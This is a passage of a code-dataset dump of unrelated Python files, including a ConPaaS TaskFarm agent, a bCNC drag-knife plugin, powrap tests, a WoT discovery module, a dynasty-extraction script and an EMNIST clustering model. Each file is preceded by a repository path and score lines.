number_of_instances): result = [] for a_prop_key in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE]: for a_type_key in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE][a_prop_key]: for a_cardinality in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE][a_prop_key][a_type_key]: frequency = self._compute_frequency(number_of_instances, self._class_profile_dict [class_key] [_POS_FEATURES_INVERSE] [a_prop_key] [a_type_key] [a_cardinality]) if frequency >= acceptance_threshold: result.append(Statement(st_property=a_prop_key, st_type=a_type_key, cardinality=a_cardinality, probability=frequency, is_inverse=True)) return result def _build_base_direct_statements(self, acceptance_threshold, class_key, number_of_instances): result = [] for a_prop_key in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT]: for a_type_key in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT][a_prop_key]: for a_cardinality in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT][a_prop_key][a_type_key]: frequency = self._compute_frequency(number_of_instances, self._class_profile_dict [class_key] [_POS_FEATURES_DIRECT] [a_prop_key] [a_type_key] [a_cardinality]) if frequency >= acceptance_threshold: result.append(Statement(st_property=a_prop_key, st_type=a_type_key, cardinality=a_cardinality, probability=frequency, is_inverse=False)) return result # def _set_serializer_object_for_statements(self, statement): # statement.serializer_object = BaseStatementSerializer( # instantiation_property_str=self._instantiation_property_str, # disable_comments=self._disable_comments, # is_inverse=statement.is_inverse) # # def _get_serializer_for_choice_statement(self): # return FixedPropChoiceStatementSerializer( # instantiation_property_str=self._instantiation_property_str, # disable_comments=self._disable_comments, # is_inverse=statement.is_inverse)
1.664063
2
conpaas-services/src/conpaas/services/taskfarm/agent/agent.py
bopopescu/conpaas-1
5
12768427
<reponame>bopopescu/conpaas-1 # -*- coding: utf-8 -*- """ :copyright: (C) 2010-2013 by Contrail Consortium. """ from subprocess import Popen from conpaas.core.expose import expose from conpaas.core.https.server import HttpJsonResponse from conpaas.core.agent import BaseAgent class TaskFarmAgent(BaseAgent): """Agent class with the following exposed methods: check_agent_process() -- GET create_hub(my_ip) -- POST create_node(my_ip, hub_ip) -- POST """ def __init__(self, config_parser, **kwargs): """Initialize TaskFarm Agent. 'config_parser' represents the agent config file. **kwargs holds anything that can't be sent in config_parser. """ BaseAgent.__init__(self, config_parser) # Path to the TaskFarm JAR file self.taskfarm_dir = config_parser.get('agent', 'CONPAAS_HOME') # The following two variables have the same value on the Hub self.my_ip_address = None self.hub_ip_address = None @expose('POST') def create_hub(self, kwargs): """Create a TaskFarm Hub by starting taskfarm server with -role hub""" self.logger.info('Hub starting up') self.state = 'PROLOGUE' self.my_ip_address = self.hub_ip_address = kwargs['my_ip'] # Starting taskfarm hub start_args = [ "java", "-jar", "taskfarm-server", "-role", "hub" ] self.logger.debug("Running command: '%s'. cwd='%s'" % ( " ".join(start_args), self.taskfarm_dir)) proc = Popen(start_args, cwd=self.taskfarm_dir, close_fds=True) self.state = 'RUNNING' self.logger.info('Hub started up. TaskFarm pid=%d' % proc.pid) return HttpJsonResponse() @expose('POST') def create_node(self, kwargs): """Create a TaskFarm Node. As this host will actually fire up browser sessions, and we want to run the tests in a non-interactive fashion, X output will be sent to a fake display.""" self.logger.info('Node starting up') self.state = 'ADAPTING' self.my_ip_address = kwargs['my_ip'] self.hub_ip_address = kwargs['hub_ip'] # Running the TaskFarm Node via xvfb-run and DISPLAY set to :1. We # have to specify the PATH because Popen overrides all the environment # variables if env is specified. Using port 3306 (MySQL) to avoid # requesting yet another port to be open. # TODO: as this file was created from a BLUEPRINT file, # you may want to change ports, paths and/or other start_args # to meet your specific service/server needs start_args = [ "xvfb-run", "--auto-servernum", "java", "-jar", "taskfarm-server", "-role", "node", "-port", "3306", "-hub", "http://%s:4444/grid/register" % self.hub_ip_address, "-host", self.my_ip_address, "-maxSession", "6", "-browser", "browserName=firefox,maxInstances=3", "-browser", "browserName=chrome,maxInstances=3", ] env = { 'DISPLAY': ':1', 'PATH': '/bin:/usr/bin:/usr/local/bin' } self.logger.debug("Running command: '%s'. cwd='%s', env='%s'" % ( " ".join(start_args), self.taskfarm_dir, env)) proc = Popen(start_args, cwd=self.taskfarm_dir, env=env, close_fds=True) self.state = 'RUNNING' self.logger.info('Node started up. TaskFarm pid=%d' % proc.pid) return HttpJsonResponse()
1.4375
1
plugins/dragknife.py
hdo/bCNC
0
12768555
#!/usr/bin/python # -*- coding: ascii -*- # Author: @harvie <NAME> # Date: 25 sept 2018 __author__ = "@harvie <NAME>" #__email__ = "" __name__ = _("DragKnife") __version__ = "0.3.0" import math import os.path import re from CNC import CNC,Block from bmath import Vector from bpath import eq, Path, Segment from ToolsPage import Plugin from math import pi, sqrt, sin, cos, asin, acos, atan2, hypot, degrees, radians, copysign, fmod class Tool(Plugin): __doc__ = _("""Drag knife postprocessor""") #<<< This comment will be show as tooltip for the ribbon button def __init__(self, master): Plugin.__init__(self, master,"DragKnife") self.icon = "dragknife" #<<< This is the name of file used as icon for the ribbon button. It will be search in the "icons" subfolder self.group = "CAM" #<<< This is the name of group that plugin belongs #self.oneshot = True #Here we are creating the widgets presented to the user inside the plugin #Name, Type , Default value, Description self.variables = [ #<<< Define a list of components for the GUI ("name" , "db" , "", _("Name")), #used to store plugin settings in the internal database ("offset", "mm", 3, _("dragknife offset"), _("distance from dragknife rotation center to the tip of the blade")), ("angle", "float", 20, _("angle threshold"), _("do not perform pivot action for angles smaller than this")), ("swivelz", "mm", 0, _("swivel height"), _("retract to this height for pivots (useful for thick materials, you should enter number slightly lower than material thickness)")), ("initdir", "X+,Y+,Y-,X-,none", "X+", _("initial direction"), _("direction that knife blade is facing before and after cut. Eg.: if you set this to X+, then the knifes rotation axis should be on the right side of the tip. Meaning that the knife is ready to cut towards right immediately without pivoting. If you cut multiple shapes in single operation, it's important to have this set consistently across all of them.")), ("feed", "mm", 200, _("feedrate")), ("simulate", "bool", False, _("simulate"), _("Use this option to simulate cuting of dragknife path. Resulting shape will reflect what shape will actuall be cut. This should reverse the dragknife procedure and give you back the original shape from g-code that was previously processed for dragknife.")), ("simpreci", "mm", 0.5, _("simulation precision"), _("Simulation is currently approximated by using lots of short lines. This is the length of these lines.")) ] self.buttons.append("exe") #<<< This is the button added at bottom to call the execute method below self.help = """DragKnifes are special kind of razor/blade holders that can be fit into spindle of your CNC (do not turn the spindle on!!!). They are often used to cut soft and thin materials like vinyl stickers, fabric, leather, rubber gaskets, paper, cardboard, etc... Dragknife blade is located off center to allow for automatic rotation (kinda like rear wheels of car pivot to the direction of front wheels). This fact introduces the need for preprocessing the g-code to account with that offset. Otherwise it wouldn't be able to cut sharp corners. This plugin does this g-code postprocessing. """ # ---------------------------------------------------------------------- # This method is executed when user presses the plugin execute button # ---------------------------------------------------------------------- def execute(self, app): dragoff = self.fromMm("offset") angleth = self["angle"] swivelz = self.fromMm("swivelz") initdir = self["initdir"] CNC.vars["cutfeed"] = self.fromMm("feed") simulate = self["simulate"] simpreci = self["simpreci"] def initPoint(P, dir, offset): P = Vector(P[0], P[1]) if dir == 'X+': P[0]+=offset elif dir == 'X-': P[0]-=offset elif dir == 'Y+': P[1]+=offset elif dir == 'Y-': P[1]-=offset return P blocks = [] for bid in app.editor.getSelectedBlocks(): if len(app.gcode.toPath(bid)) < 1: continue opath = app.gcode.toPath(bid)[0] npath = Path("dragknife %s: %s"%(dragoff,app.gcode[bid].name())) if not simulate: #Entry vector ventry = Segment(Segment.LINE, initPoint(opath[0].A, initdir, -dragoff), opath[0].A) #Exit vector vexit = Segment(Segment.LINE, opath[-1].B, initPoint(opath[-1].B, initdir, dragoff)) opath.append(vexit) prevseg = ventry #Generate path with tangential lag for dragknife operation for i,seg in enumerate(opath): #Get adjacent tangential vectors in this point TA = prevseg.tangentEnd() TB = seg.tangentStart() #Compute difference between tangential vectors of two neighbor segments angle = degrees(acos(TA.dot(TB))) #Compute swivel direction arcdir = ( TA[0] * TB[1] ) - ( TA[1] * TB[0] ) if arcdir < 0: arcdir = Segment.CW else: arcdir = Segment.CCW #Append swivel if needed (also always do entry/exit) if abs(angle) > angleth or (abs(angle) > 1 and ( i == 0 or i == len(opath)-1 )): arca = Segment(arcdir, prevseg.tangentialOffset(dragoff).B, seg.tangentialOffset(dragoff).A, prevseg.B) if swivelz !=0: arca._inside = [swivelz] npath.append(arca) #Append segment with tangential offset if i < len(opath)-1: npath.append(seg.tangentialOffset(dragoff)) prevseg = seg elif simulate: opath = opath.linearize(simpreci, True) prevknife = initPoint(opath[0].A, initdir, -dragoff) for seg in opath: dist = sqrt((seg.B[0]-prevknife[0])**2+(seg.B[1]-prevknife[1])**2) move = ( seg.B - prevknife ).unit() * ( dist - dragoff ) newknife = prevknife + move if not eq(newknife, prevknife): npath.append(Segment(Segment.LINE, prevknife, newknife)) prevknife = newknife eblock = app.gcode.fromPath(npath) blocks.append(eblock) #active = app.activeBlock() #if active == 0: active+=1 active=-1 #add to end app.gcode.insBlocks(active, blocks, "Dragknife") #<<< insert blocks over active block in the editor app.refresh() #<<< refresh editor app.setStatus(_("Generated: Dragknife")) #<<< feed back result #app.gcode.blocks.append(block)
2.390625
2
src/ufdl/json/core/jobs/_WorkableTemplateSpec.py
waikato-ufdl/ufdl-json-messages
0
12768683
<reponame>waikato-ufdl/ufdl-json-messages from typing import List from wai.json.object import StrictJSONObject from wai.json.object.property import StringProperty, ArrayProperty from ._InputSpec import InputSpec from ._ParameterSpec import ParameterSpec class WorkableTemplateSpec(StrictJSONObject['WorkableTemplateSpec']): """ JSON document specifying parameters for a job template which can be worked by worker-nodes. """ # The framework being used by the worker node, in 'name|version' format framework: str = StringProperty(min_length=3, max_length=49) # The type of job this template performs job_type: str = StringProperty(min_length=1, max_length=32) # The executor class responsible for executing this template executor_class: str = StringProperty(max_length=128) # Any packages that the executor class requires to complete the task required_packages: str = StringProperty() # The body of the job body: str = StringProperty() # Any inputs to the job required to perform the task inputs: List[InputSpec] = ArrayProperty(element_property=InputSpec.as_property()) # Any parameters to the job required to perform the task parameters: List[ParameterSpec] = ArrayProperty(element_property=ParameterSpec.as_property())
1.296875
1
draugr/generators/zipping_generator.py
cnHeider/draugr
3
12768811
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from copy import deepcopy from typing import Any, Generator, Iterable, Iterator __author__ = "<NAME>" __doc__ = r""" Created on 28/10/2019 """ __all__ = ["unzip", "unzipper"] def unzip(iterable: Iterable) -> Iterable: """ """ return zip(*iterable) def unzipper(iterable: Iterable[Iterable]) -> Iterable: """ Unzips an iterable of an iterable Be carefully has undefined and expected behaviour :param iterable: :return:""" def check_next_iter(iterable: Any) -> Any: """ """ if isinstance(iterable, Iterable): try: a = next(iter(iterable)) if isinstance(a, Iterable): return a except StopIteration: pass if isinstance(iterable, Iterable): check_a = check_next_iter(check_next_iter(deepcopy(iterable))) if check_next_iter(check_a): for a in iterable: yield unzipper(a) elif check_a: for a in iterable: yield unzip(a) else: for i in iterable: yield i return if __name__ == "__main__": def recursive_eval(node: Any): """ """ if isinstance(node, (Iterable, Generator, Iterator)): gather = [] for i in node: gather.append(recursive_eval(i)) return gather return node def aasda(): """ """ r = range(4) print(0) a = [[[*r] for _ in r] for _ in r] print(a) print(1) for _, assd in zip(r, unzipper(a)): print() print(recursive_eval(assd)) print() for _, (a, *_) in zip(r, unzipper(a)): print() print(recursive_eval(a)) print() print(2) def skad23(): """ """ print(0) zippy_once = zip(range(6), range(3)) dsadsa = list(deepcopy(zippy_once)) zippy_twice = zip(dsadsa, dsadsa) zippy_twice_copy = deepcopy(zippy_twice) asds = list(deepcopy(zippy_twice_copy)) zippy_trice = zip(asds, asds) zippy_trice_copy = deepcopy(zippy_trice) print(1) for aa in zippy_twice: print(recursive_eval(aa)) print(2) for a1 in unzip(zippy_twice_copy): print(recursive_eval(a1)) print(3) for a1 in unzip(zippy_once): print(recursive_eval(a1)) print(4) for a1 in zippy_trice: print(recursive_eval(a1)) print(5) for a1 in unzip(zippy_trice_copy): print(recursive_eval(a1)) print(6) def skad(): """ """ print(0) zippy_once = zip(zip(range(6), range(3))) zippy_once_copy = deepcopy(zippy_once) dsadsa = list(deepcopy(zippy_once)) zippy_twice = zip(dsadsa, dsadsa) zippy_twice_copy = deepcopy(zippy_twice) asds = list(deepcopy(zippy_twice_copy)) zippy_trice = zip(asds, asds) zippy_trice_copy = deepcopy(zippy_trice) asds2323 = list(deepcopy(zippy_trice_copy)) zippy_quad = zip(asds2323, asds2323) zippy_quad_copy = deepcopy(zippy_quad) print(1) for aa in zippy_twice: print(recursive_eval(aa)) print(2) for a1 in unzipper(zippy_twice_copy): print(recursive_eval(a1)) print(3) for a1 in zippy_once_copy: print(recursive_eval(a1)) print(4) for a1 in unzipper(zippy_once): print(recursive_eval(a1)) print(5) for a1 in zippy_trice: print(recursive_eval(a1)) print(6) for a1 in unzipper(zippy_trice_copy): print(recursive_eval(a1)) print(7) for a1 in zippy_quad: print(recursive_eval(a1)) print(8) for a1 in unzipper(zippy_quad_copy): print(recursive_eval(a1)) print(9) aasda() print() print("asafasdw") print() skad() # skad23()
2.21875
2
Archive/dynasty_extract.py
46319943/SLan-NLP
0
12768939
<reponame>46319943/SLan-NLP<filename>Archive/dynasty_extract.py import re def past_time_concat(loc_list: list): ''' 连接误分割的公元前字符串 ''' loc_list = loc_list.copy() for index, loc_str in enumerate(loc_list): if loc_str == '公元前' and '000' in loc_list[index + 1]: loc_list[index] = loc_list[index] + loc_list[index + 1] loc_list[index + 1] = '' print(loc_list[index]) return loc_list def time_filter(time_str: str) -> str: ''' 过滤无法判断时间的词语 归类表示现在的词语 :param time_str: :return: ''' if time_str == '' or time_str == ' ': return None if time_str in [ '每年', '每日', '当时', '中期', '此后', '当年', '早期', '昔日', '明天', '同年', '一时', '过去', '每天', '一日', '其后', '次年', '未来', '后来', '初年', '后期', '古代', '初期', '今', ]: return None if time_str in [ '目前', '现在', '今天', '近年', '现代', '现', '今日', '近代', '此时', '近现代', '当代', '当前']: return '现代' time_str = time_str.replace('时期', '') return time_str def year_filter(time_str: str) -> str: ''' 将年转为具体朝代 :param time_str: :return: ''' if '年' not in time_str: return time_str if time_str.startswith('近'): return None if '以后' in time_str: return None if time_str == '2020年前': return None time_str.replace('1700万,1850年', '1850年') pattern_before = re.search('前\S*?(\d{3,4})', time_str) pattern_past = re.search('(\d{3,4})\S*?前', time_str) pattern_4 = re.search('\d{4}', time_str) pattern_3 = re.search('\d{3}', time_str) pattern_2 = re.search('公元(\d{2})', time_str) if pattern_before: time_int = -int(pattern_before.group(1)) elif pattern_past: time_int = 2021 - int(pattern_past.group(1)) elif '多年' in time_str: time_int = None elif pattern_4: time_int = int(pattern_4.group(0)) elif pattern_3: time_int = int(pattern_3.group(0)) elif pattern_2: time_int = int(pattern_2.group(1)) else: time_int = None # if re.search('\d{4}', time_str): # print(time_str + ' --> ' + re.search('\d{4}', time_str).group(0)) # return re.search('\d{4}', time_str).group(0) # elif re.search('\d{1,2}', time_str): # print(time_str + 'X') # return None # if time_int is not None: # print(time_str + ' --> ' + str(time_int)) # return str(time_int) # else: # print(time_str + ' X') # return None if time_int is None: return None if time_int >= 1368 and time_int <= 1644: return '明朝' elif time_int >= 1644 and time_int <= 1912: return '清朝' elif time_int > 1912: return '现代' elif time_int >= 1279 and time_int <= 1368: return '元朝' elif time_int >= 907 and time_int <= 1279: return '宋朝' elif time_int >= 618 and time_int <= 907: return '唐朝' elif time_int >= 581 and time_int <= 618: return '隋朝' elif time_int >= 265 and time_int <= 581: return '魏晋南北朝' elif time_int >= 220 and time_int <= 265: return '三国' elif time_int >= -206 and time_int <= 220: return '汉代' elif time_int >= -221 and time_int <= -206: return '秦代' elif time_int >= -770 and time_int <= -221: return '春秋战国' elif time_int >= -1100 and time_int <= -770: return '西周' elif time_int >= -1600 and time_int <= -1100: return '商代' elif time_int >= -2100 and time_int <= -1600: return '夏代' elif time_int <= -2100: return '黄帝' else: raise Exception('No dynasty matched') def dynasty_filter(time_str) -> str: import re mapping_dict = { '西汉初期': '汉代', '西汉': '汉代', '明中期': '明朝', '唐时': '唐朝', '商末': '商代', '东汉初': '汉代', '当上元': '唐朝', '盛唐': '唐朝', '元朝末期': '元朝', '五代': '宋朝', '北魏': '魏晋南北朝', '秦汉': ['秦代', '汉代'], '元朝初': '元朝', '明前期': '明朝', '民国初': '现代', '明': '明朝', '明清时': ['明朝', '清朝'], '五代十国': '宋朝', '晚唐': '唐朝', '隋末': '隋朝', '唐中': '唐朝', '宋末': '宋朝', '唐末': '唐朝', '魏晋': '魏晋南北朝', '明朝中期': '明朝', '先秦': '秦代', '战国': '春秋战国', '汉朝': '汉代', '宋元': ['宋朝', '元朝'], '明清': ['明朝', '清朝'], '清代': '清朝', '元代': '元朝', '明代': '明朝', '宋代': '宋朝', '唐代': '唐朝', '隋代': '隋朝', '南北朝': '魏晋南北朝', '晚清': '清朝', '春秋': '春秋战国', '元末': '元朝', '元初': '元朝', '东汉': '汉代', '唐': '唐朝', '民国': '现代', '秦朝': '秦代', '唐宋': ['唐朝', '宋朝'], '明末': '明朝', '明初': '明朝', '清初': '清朝', '隋唐': ['隋朝', '唐朝'], '清末': '清朝', } if time_str in mapping_dict: return mapping_dict[time_str] return time_str def dynasty_select(time_str: str) -> bool: return time_str in ['现代', '清朝', '明朝', '唐朝', '宋朝', '元朝', '隋朝', '魏晋南北朝', '春秋战国', '汉代', '秦代', '三国', '黄帝', '夏代', '西周', '商代'] def dynasty_extract(loc_list: list): loc_list = loc_list.copy() loc_list = past_time_concat(loc_list) loc_list = [time_filter(time_str) for time_str in loc_list if time_filter(time_str) is not None] loc_list = [year_filter(time_str) for time_str in loc_list if year_filter(time_str) is not None] loc_list_copy = loc_list.copy() loc_list = [] for index, time_str in enumerate(loc_list_copy): dynasty_result = dynasty_filter(time_str) if isinstance(dynasty_result, list): loc_list.extend(dynasty_result) else: loc_list.append(dynasty_result) loc_list = [time_str for time_str in loc_list if dynasty_select(time_str)] return loc_list def dynasty_extract_plus_loc(time_list, loc_list): pass if __name__ == '__main__': import pandas as pd from slab.pickle_util import pickle_to_file, unpickle_from_file df = unpickle_from_file('df.pkl') loc_list = df['line_time_result'].values loc_list = [word for line in loc_list for word in line] print(pd.Series(dynasty_extract(loc_list)).value_counts())
1.992188
2
tests/test_powrap.py
deronnax/powrap
1
12769067
from pathlib import Path import pytest import os from powrap import powrap FIXTURE_DIR = Path(__file__).resolve().parent @pytest.mark.parametrize("po_file", (FIXTURE_DIR / "bad" / "glossary.po",)) def test_fail_on_bad_wrapping(po_file, capsys): assert powrap.check_style([po_file]) == 1 assert str(po_file) in capsys.readouterr().err @pytest.mark.parametrize("po_file", (FIXTURE_DIR / "good").glob("*.po")) def test_succees_on_good_wrapping(po_file, capsys): assert powrap.check_style([po_file]) == 0 assert str(po_file) not in capsys.readouterr().err @pytest.mark.parametrize("po_file", (FIXTURE_DIR / "bad" / "invalid_po_file.po",)) def test_msgcat_error(po_file, capsys): assert powrap.check_style([po_file]) == 0 assert str(po_file) not in capsys.readouterr().err @pytest.mark.parametrize("po_file", ("non_existent_file.po",)) def test_fileread_error(po_file, capsys): assert powrap.check_style([po_file]) == 0 assert str(po_file) not in capsys.readouterr().err @pytest.mark.parametrize("po_file", (FIXTURE_DIR / "good").glob("*.po")) def test_wrong_msgcat(po_file): """Test if msgcat is not available""" environ_saved = os.environ["PATH"] os.environ["PATH"] = "" with pytest.raises(SystemExit) as sysexit: powrap.check_style([po_file]) os.environ["PATH"] = environ_saved assert sysexit.type == SystemExit assert sysexit.value.code == 127
1.40625
1
wotpy/wot/wot.py
JKRhb/wot-py
24
12769195
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Class that serves as the WoT entrypoint. """ import json import logging import warnings import six import tornado.concurrent import tornado.gen import tornado.ioloop from rx import Observable from six.moves import range from tornado.httpclient import AsyncHTTPClient, HTTPRequest from wotpy.support import is_dnssd_supported from wotpy.utils.utils import handle_observer_finalization from wotpy.wot.consumed.thing import ConsumedThing from wotpy.wot.dictionaries.thing import ThingFragment from wotpy.wot.enums import DiscoveryMethod from wotpy.wot.exposed.thing import ExposedThing from wotpy.wot.td import ThingDescription from wotpy.wot.thing import Thing DEFAULT_FETCH_TIMEOUT_SECS = 20.0 class WoT(object): """The WoT object is the API entry point and it is exposed by an implementation of the WoT Runtime. The WoT object does not expose properties, only methods for discovering, consuming and exposing a Thing.""" def __init__(self, servient): self._servient = servient self._logr = logging.getLogger(__name__) @property def servient(self): """Servient instance of this WoT entrypoint.""" return self._servient @classmethod def _is_fragment_match(cls, item, thing_filter): """Returns True if the given item (an ExposedThing, Thing or TD) matches the fragment in the given Thing filter.""" td = None if isinstance(item, ExposedThing): td = ThingDescription.from_thing(item.thing) elif isinstance(item, Thing): td = ThingDescription.from_thing(item) elif isinstance(item, ThingDescription): td = item assert td fragment_dict = thing_filter.fragment if thing_filter.fragment else {} return all( item in six.iteritems(td.to_dict()) for item in six.iteritems(fragment_dict)) def _build_local_discover_observable(self, thing_filter): """Builds an Observable to discover Things using the local method.""" found_tds = [ ThingDescription.from_thing(exposed_thing.thing).to_str() for exposed_thing in self._servient.exposed_things if self._is_fragment_match(exposed_thing, thing_filter) ] # noinspection PyUnresolvedReferences return Observable.of(*found_tds) def _build_dnssd_discover_observable(self, thing_filter, dnssd_find_kwargs): """Builds an Observable to discover Things using the multicast method based on DNS-SD.""" if not is_dnssd_supported(): warnings.warn("Unsupported DNS-SD multicast discovery") # noinspection PyUnresolvedReferences return Observable.empty() dnssd_find_kwargs = dnssd_find_kwargs if dnssd_find_kwargs else {} if not self._servient.dnssd: # noinspection PyUnresolvedReferences return Observable.empty() def subscribe(observer): """Browses the Servient services using DNS-SD and retrieves the TDs that match the filters.""" state = {"stop": False} @handle_observer_finalization(observer) @tornado.gen.coroutine def callback(): address_port_pairs = yield self._servient.dnssd.find(**dnssd_find_kwargs) def build_pair_url(idx, path=None): addr, port = address_port_pairs[idx] base = "http://{}:{}".format(addr, port) path = path if path else '' return "{}/{}".format(base, path.strip("/")) http_client = AsyncHTTPClient() catalogue_resps = [ http_client.fetch(build_pair_url(idx)) for idx in range(len(address_port_pairs)) ] wait_iter = tornado.gen.WaitIterator(*catalogue_resps) while not wait_iter.done() and not state["stop"]: try: catalogue_resp = yield wait_iter.next() except Exception as ex: self._logr.warning( "Exception on HTTP request to TD catalogue: {}".format(ex)) else: catalogue = json.loads(catalogue_resp.body) if state["stop"]: return td_resps = yield [ http_client.fetch(build_pair_url( wait_iter.current_index, path=path)) for thing_id, path in six.iteritems(catalogue) ] tds = [ ThingDescription(td_resp.body) for td_resp in td_resps ] tds_filtered = [ td for td in tds if self._is_fragment_match(td, thing_filter)] [observer.on_next(td.to_str()) for td in tds_filtered] def unsubscribe(): state["stop"] = True tornado.ioloop.IOLoop.current().add_callback(callback) return unsubscribe # noinspection PyUnresolvedReferences return Observable.create(subscribe) def discover(self, thing_filter, dnssd_find_kwargs=None): """Starts the discovery process that will provide ThingDescriptions that match the optional argument filter of type ThingFilter.""" supported_methods = [ DiscoveryMethod.ANY, DiscoveryMethod.LOCAL, DiscoveryMethod.MULTICAST ] if thing_filter.method not in supported_methods: err = NotImplementedError("Unsupported discovery method") # noinspection PyUnresolvedReferences return Observable.throw(err) if thing_filter.query: err = NotImplementedError( "Queries are not supported yet (please use filter.fragment)") # noinspection PyUnresolvedReferences return Observable.throw(err) observables = [] if thing_filter.method in [DiscoveryMethod.ANY, DiscoveryMethod.LOCAL]: observables.append( self._build_local_discover_observable(thing_filter)) if thing_filter.method in [DiscoveryMethod.ANY, DiscoveryMethod.MULTICAST]: observables.append(self._build_dnssd_discover_observable( thing_filter, dnssd_find_kwargs)) # noinspection PyUnresolvedReferences return Observable.merge(*observables) @classmethod @tornado.gen.coroutine def fetch(cls, url, timeout_secs=None): """Accepts an url argument and returns a Future that resolves with a Thing Description string.""" timeout_secs = timeout_secs or DEFAULT_FETCH_TIMEOUT_SECS http_client = AsyncHTTPClient() http_request = HTTPRequest(url, request_timeout=timeout_secs) http_response = yield http_client.fetch(http_request) td_doc = json.loads(http_response.body) td = ThingDescription(td_doc) raise tornado.gen.Return(td.to_str()) def consume(self, td_str): """Accepts a thing description string argument and returns a ConsumedThing object instantiated based on that description.""" td = ThingDescription(td_str) return ConsumedThing(servient=self._servient, td=td) @classmethod def thing_from_model(cls, model): """Takes a ThingModel and builds a Thing. Raises if the model has an unexpected type.""" expected_types = (six.string_types, ThingFragment, ConsumedThing) if not isinstance(model, expected_types): raise ValueError("Expected one of: {}".format(expected_types)) if isinstance(model, six.string_types): thing = ThingDescription(doc=model).build_thing() elif isinstance(model, ThingFragment): thing = Thing(thing_fragment=model) else: thing = model.td.build_thing() return thing def produce(self, model): """Accepts a model argument of type ThingModel and returns an ExposedThing object, locally created based on the provided initialization parameters.""" thing = self.thing_from_model(model) exposed_thing = ExposedThing(servient=self._servient, thing=thing) self._servient.add_exposed_thing(exposed_thing) return exposed_thing @tornado.gen.coroutine def produce_from_url(self, url, timeout_secs=None): """Return a Future that resolves to an ExposedThing created from the thing description retrieved from the given URL.""" td_str = yield self.fetch(url, timeout_secs=timeout_secs) exposed_thing = self.produce(td_str) raise tornado.gen.Return(exposed_thing) @tornado.gen.coroutine def consume_from_url(self, url, timeout_secs=None): """Return a Future that resolves to a ConsumedThing created from the thing description retrieved from the given URL.""" td_str = yield self.fetch(url, timeout_secs=timeout_secs) consumed_thing = self.consume(td_str) raise tornado.gen.Return(consumed_thing) @tornado.gen.coroutine def register(self, directory, thing): """Generate the Thing Description as td, given the Properties, Actions and Events defined for this ExposedThing object. Then make a request to register td to the given WoT Thing Directory.""" raise NotImplementedError() @tornado.gen.coroutine def unregister(self, directory, thing): """Makes a request to unregister the thing from the given WoT Thing Directory.""" raise NotImplementedError()
1.679688
2
3rdparty/packages/all.py
cspanier/shift
2
12769323
#!/usr/bin/env python3 import sys from build import Builder package_name = Builder.package_name_from_filename(__file__) dependencies = ('zlib-1.2.11', 'bzip2-1.0.8', 'jpeg-9c', 'zstd-be3bd70', 'tiff-4.0.10', 'icu4c-65_1', 'boost_1_71_0') def prepare(builder): return True def build(builder): return True def cleanup(builder): return True if __name__ == "__main__": print('You must not call this script directly.') sys.exit(1)
1.09375
1
models/multi_emnist.py
OpenXAIProject/dac
17
12769451
<filename>models/multi_emnist.py import os import argparse import matplotlib.pyplot as plt import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torchvision.utils import make_grid from torch.nn.utils import weight_norm from utils.misc import add_args from utils.paths import datasets_path, benchmarks_path from utils.tensor import to_numpy from data.base import sample_anchors from data.multi_emnist import ClusteredMultiEMNIST, sample_idxs, \ get_train_loader, get_test_loader from modules.attention import StackedISAB, PMA, MAB from modules.misc import Flatten, View from flows.autoregressive import MAF from flows.distributions import FlowDistribution, Normal, Bernoulli from models.base import AnchoredFilteringModel, MinFilteringModel parser = argparse.ArgumentParser() # for training parser.add_argument('--B', type=int, default=10) parser.add_argument('--N', type=int, default=100) parser.add_argument('--K', type=int, default=4) parser.add_argument('--lr', type=float, default=2e-4) parser.add_argument('--num_steps', type=int, default=20000) parser.add_argument('--filtering_benchmark', type=str, default=None) parser.add_argument('--clustering_benchmark', type=str, default=None) parser.add_argument('--vB', type=int, default=1) parser.add_argument('--vN', type=int, default=100) parser.add_argument('--vK', type=int, default=4) sub_args, _ = parser.parse_known_args() class FilteringNetwork(nn.Module): def __init__(self, num_filters=32, dim_lats=128, dim_hids=256, dim_context=256, num_inds=32): super().__init__() C = num_filters self.enc = nn.Sequential( nn.Conv2d(3, C, 3, stride=2), nn.BatchNorm2d(C), nn.ReLU(), nn.Conv2d(C, 2*C, 3, stride=2), nn.BatchNorm2d(2*C), nn.ReLU(), nn.Conv2d(2*C, 4*C, 3), Flatten()) self.isab1 = StackedISAB(4*C*4*4, dim_hids, num_inds, 4) self.pma = PMA(dim_hids, dim_hids, 1) self.fc1 = nn.Linear(dim_hids, dim_context) self.posterior = Normal(dim_lats, use_context=True, context_enc=nn.Linear(4*C*4*4 + dim_context, 2*dim_lats)) self.prior = FlowDistribution( MAF(dim_lats, dim_hids, 6, dim_context=dim_context, inv_linear=True), Normal(dim_lats)) self.dec = nn.Sequential( nn.Linear(dim_lats + dim_context, 4*C*4*4), nn.ReLU(), View(-1, 4*C, 4, 4), nn.ConvTranspose2d(4*C, 2*C, 3, stride=2, padding=1), nn.BatchNorm2d(2*C), nn.ReLU(), nn.ConvTranspose2d(2*C, C, 3, stride=2, padding=1), nn.BatchNorm2d(C), nn.ReLU(), nn.ConvTranspose2d(C, 3, 3, stride=2, output_padding=1), View(-1, 3, 28, 28)) self.likel = Bernoulli((3, 28, 28), use_context=True) self.mab = MAB(dim_hids, dim_hids, dim_hids) self.isab2 = StackedISAB(dim_hids, dim_hids, num_inds, 4) self.fc2 = nn.Linear(dim_hids, 1) def forward(self, X, mask=None, return_z=False): B, N, C, H, W = X.shape x = X.view(B*N, C, H, W) h_enc = self.enc(x) H_X = self.isab1(h_enc.view(B, N, -1), mask=mask) H_theta = self.pma(H_X, mask=mask) theta = self.fc1(H_theta) theta_ = theta.repeat(1, N, 1).view(B*N, -1) z, logq = self.posterior.sample(context=torch.cat([h_enc, theta_], -1)) logp = self.prior.log_prob(z, context=theta_) kld = (logq - logp).view(B, N) h_dec = self.dec(torch.cat([z, theta_], -1)) ll = self.likel.log_prob(x, context=h_dec).view(B, N) - kld ll /= H*W H_dec = self.mab(H_X, H_theta) logits = self.fc2(self.isab2(H_dec, mask=mask)).squeeze(-1) outputs = {'ll':ll, 'theta':theta, 'logits':logits} if return_z: outputs['z'] = z return outputs class Model(MinFilteringModel): def __init__(self, args): super().__init__(args) self.filtering_benchmark = 